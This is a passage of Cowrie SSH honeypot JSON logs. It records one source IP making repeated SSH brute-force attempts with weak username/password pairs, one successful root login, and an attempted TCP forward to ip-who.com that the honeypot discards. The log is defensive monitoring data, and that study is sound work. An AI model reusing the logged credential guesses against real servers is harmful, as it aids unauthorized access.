aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:06:16.588118Z","src_ip":"212.227.235.229","session":"dafda33c5011"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:06:17.016394Z","src_ip":"212.227.235.229","session":"1f9f7fe3b02c"}
{"eventid":"cowrie.login.failed","username":"office","password":"office","message":"login attempt [office/office] failed","sensor":"my-vps","timestamp":"2025-08-28T08:06:18.367243Z","src_ip":"212.227.235.229","session":"dafda33c5011"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:06:19.703150Z","src_ip":"212.227.235.229","session":"dafda33c5011"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39956,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d631ab14219","protocol":"ssh","message":"New connection: 212.227.235.229:39956 (1.2.3.4:22) [session: 6d631ab14219]","sensor":"my-vps","timestamp":"2025-08-28T08:06:20.986374Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:06:21.089217Z","src_ip":"212.227.235.229","session":"6d631ab14219"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:06:21.273672Z","src_ip":"212.227.235.229","session":"6d631ab14219"}
{"eventid":"cowrie.login.failed","username":"test","password":"admin","message":"login attempt [test/admin] failed","sensor":"my-vps","timestamp":"2025-08-28T08:06:22.254047Z","src_ip":"212.227.235.229","session":"e7e2d2e97c38"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39972,"dst_ip":"1.2.3.4","dst_port":22,"session":"e16ce777c0d9","protocol":"ssh","message":"New connection: 212.227.235.229:39972 (1.2.3.4:22) [session: e16ce777c0d9]","sensor":"my-vps","timestamp":"2025-08-28T08:06:22.996134Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:06:22.997870Z","src_ip":"212.227.235.229","session":"e16ce777c0d9"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:06:23.290160Z","src_ip":"212.227.235.229","session":"e16ce777c0d9"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:06:23.502071Z","src_ip":"212.227.235.229","session":"e7e2d2e97c38"}
{"eventid":"cowrie.login.failed","username":"newadmin","password":"newadmin","message":"login attempt [newadmin/newadmin] failed","sensor":"my-vps","timestamp":"2025-08-28T08:06:25.103247Z","src_ip":"212.227.235.229","session":"6d631ab14219"}
{"eventid":"cowrie.login.failed","username":"belkinstyle","password":"72ca06","message":"login attempt [belkinstyle/72ca06] failed","sensor":"my-vps","timestamp":"2025-08-28T08:06:25.312613Z","src_ip":"212.227.235.229","session":"e16ce777c0d9"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:06:26.552872Z","src_ip":"212.227.235.229","session":"e16ce777c0d9"}
{"eventid":"cowrie.login.failed","username":"software","password":"software","message":"login attempt [software/software] failed","sensor":"my-vps","timestamp":"2025-08-28T08:06:26.581457Z","src_ip":"212.227.235.229","session":"1f9f7fe3b02c"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:06:26.996698Z","src_ip":"212.227.235.229","session":"6d631ab14219"}
{"eventid":"cowrie.session.closed","duration":"12.8","message":"Connection lost after 12.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:06:28.447268Z","src_ip":"212.227.235.229","session":"1f9f7fe3b02c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33492,"dst_ip":"1.2.3.4","dst_port":22,"session":"27dc21c0f9f3","protocol":"ssh","message":"New connection: 212.227.235.229:33492 (1.2.3.4:22) [session: 27dc21c0f9f3]","sensor":"my-vps","timestamp":"2025-08-28T08:06:38.533697Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:06:38.557162Z","src_ip":"212.227.235.229","session":"27dc21c0f9f3"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:06:38.802488Z","src_ip":"212.227.235.229","session":"27dc21c0f9f3"}
{"eventid":"cowrie.login.failed","username":"george","password":"george","message":"login attempt [george/george] failed","sensor":"my-vps","timestamp":"2025-08-28T08:06:40.487065Z","src_ip":"212.227.235.229","session":"27dc21c0f9f3"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:06:41.739261Z","src_ip":"212.227.235.229","session":"27dc21c0f9f3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33498,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff5a3df21860","protocol":"ssh","message":"New connection: 212.227.235.229:33498 (1.2.3.4:22) [session: ff5a3df21860]","sensor":"my-vps","timestamp":"2025-08-28T08:06:41.965739Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:06:42.235918Z","src_ip":"212.227.235.229","session":"ff5a3df21860"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:06:42.334259Z","src_ip":"212.227.235.229","session":"ff5a3df21860"}
{"eventid":"cowrie.login.success","username":"root","password":"explorer","message":"login attempt [root/explorer] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:06:44.141125Z","src_ip":"212.227.235.229","session":"ff5a3df21860"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-28T08:06:44.606057Z","session":"ff5a3df21860"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T08:06:44.862119Z","src_ip":"212.227.235.229","session":"ff5a3df21860"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48206,"dst_ip":"1.2.3.4","dst_port":22,"session":"2670ba7a5096","protocol":"ssh","message":"New connection: 212.227.235.229:48206 (1.2.3.4:22) [session: 2670ba7a5096]","sensor":"my-vps","timestamp":"2025-08-28T08:06:45.472616Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:06:45.576254Z","src_ip":"212.227.235.229","session":"2670ba7a5096"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:06:45.582936Z","src_ip":"212.227.235.229","session":"ff5a3df21860"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5